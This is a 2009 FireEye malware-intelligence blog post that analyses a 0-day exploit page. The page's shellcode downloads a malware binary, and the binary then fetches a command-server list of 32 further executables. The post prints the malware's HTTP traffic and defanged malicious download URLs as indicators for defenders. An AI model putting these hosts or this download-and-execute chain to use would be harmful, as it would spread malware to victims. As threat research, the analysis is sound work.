Here is what the exploit page looks like:

where a.js looks like this:

If successfully exploited, the above shell code fetches a malware binary from hxxp://www.fdasfadf.cn/new.exe

Let's see what the actual payload i.e new.exe is all about.

Here is VirtusTotal report for new.exe

Upon execution this malware produces outbound communication like this:

GET /hao.txt HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.98765W; Windows NT 5.1; SV1)
Host: www.qvod69.cn
Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Length: 1077

Content-Type: text/plain

Last-Modified: Mon, 13 Jul 2009 02:23:59 GMT

Accept-Ranges: bytes

ETag: "20efc5fa603ca1:2ea"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Tue, 14 Jul 2009 02:19:23 GMT

1:hxxp://www.fghndrgse.cn/1.exe
1:hxxp://www.fghndrgse.cn/2.exe
1:hxxp://www.fghndrgse.cn/3.exe
1:hxxp://www.fghndrgse.cn/4.exe
1:hxxp://www.fghndrgse.cn/5.exe
1:hxxp://www.fghndrgse.cn/6.exe
1:hxxp://www.fghndrgse.cn/7.exe
1:hxxp://www.fghndrgse.cn/8.exe
1:hxxp://www.fghndrgse.cn/9.exe
1:hxxp://www.fghndrgse.cn/10.exe
1:hxxp://www.fghndrgse.cn/11.exe
1:hxxp://www.fghndrgse.cn/12.exe
1:hxxp://www.fghndrgse.cn/13.exe
1:hxxp://www.fghndrgse.cn/14.exe
1:hxxp://www.fghndrgse.cn/15.exe
1:hxxp://www.fghndrgse.cn/16.exe
1:hxxp://www.fghndrgse.cn/17.exe
1:hxxp://www.fghndrgse.cn/18.exe
1:hxxp://www.fghndrgse.cn/19.exe
1:hxxp://www.fghndrgse.cn/20.exe
1:hxxp://www.fghndrgse.cn/21.exe
1:hxxp://www.fghndrgse.cn/22.exe
1:hxxp://www.fghndrgse.cn/23.exe
1:hxxp://www.fghndrgse.cn/24.exe
1:hxxp://www.fghndrgse.cn/25.exe
1:hxxp://www.fghndrgse.cn/26.exe
1:hxxp://www.fghndrgse.cn/27.exe
1:hxxp://www.fghndrgse.cn/28.exe
1:hxxp://www.fghndrgse.cn/29.exe
1:hxxp://www.fghndrgse.cn/30.exe
1:hxxp://www.fghndrgse.cn/31.exe
1:hxxp://www.fghndrgse.cn/32.exe

This communication might look familiar to those who got a chance to read my earlier article (Who is Exploiting the Windows 0-day (MSVIDCTL.DLL) ?) which was about a malware who was seen to exploit MSVIDCTRL 0-day. Yes 'new.exe' is the malware variant which belongs to the same family.

ThreatExpert report for new.exe

ThreatExpert report for the malware found to be exploited MSVIDCTRL last week.

The only difference between these two variants is a slightly modified binary and network footprint to evade conventional AVs and IDS signatures. I am not surprised at all that both of these 0-days are being exploited by same malware group. In past we have seen several cases where some of the world's top botnets were found to be controlled by closely linked cyber criminals.

Those who want to recollect might refer to these archived articles:

http://blog.fireeye.com/research/2008/08/srizbi-and-rust.html
http://blog.fireeye.com/research/2008/08/srizbi-and-ru-1.html
http://blog.fireeye.com/research/2008/09/new-axis-of-evi.html
http://blog.fireeye.com/research/2009/02/srizbi-xarvester-and-microsoft.html

Atif Mushtaq @ FireEye Malware Intelligence Lab

Question/Comments : research SHIFT-2 fireeye DOT COM